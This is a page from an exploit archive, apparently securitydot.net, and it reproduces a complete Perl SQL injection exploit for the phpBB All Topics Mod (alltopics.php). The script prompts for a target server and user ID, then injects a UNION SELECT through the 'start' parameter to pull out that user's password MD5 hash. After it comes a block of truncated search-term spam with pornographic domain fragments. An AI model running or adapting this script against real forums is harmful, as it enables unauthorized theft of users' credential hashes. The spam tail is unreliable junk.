about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit




2006-08-23 phpBB All Topics Mod <= 1.5.0 (start) Remote SQL Injection Exploit
Rated as : Critical

#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+    Mod: http://www.phpbbhacks.com/download/2821    +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .=
"alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_
users%20where%20user_id=".$user ;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}
securitydot.net - 2006-08-23

Advertising

Copyright 2007, SecurityDot
Sun, 08 Nov 2009 10:00:49 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.shuang sexvedio cep18.com port 1469 aflam sxs _____ ____ shop.paipa www700.com nutan Codes com_mtree. video porn www.mnjyw. Advanced+G WWW.TOLLYW bis www. ta www.mnjyw. www.anushk sexlalat.c sexpotho.c com_mtree. www.zgjfbj REMOTE ACC www.2jiqin websense f Keralasex. www.trustg crack+data www.zgjfbj OpenSSH 4. its my lif www.sickor www.colleg News Searc www.Southi WWW.TOLLYW www.fcyr66 www+.sextv www.fcyr66 fuckme.com www.fcyr66 fuck man t free sex m www.Southi www.indiah www89com Invision F PHP+Advanc exploit ip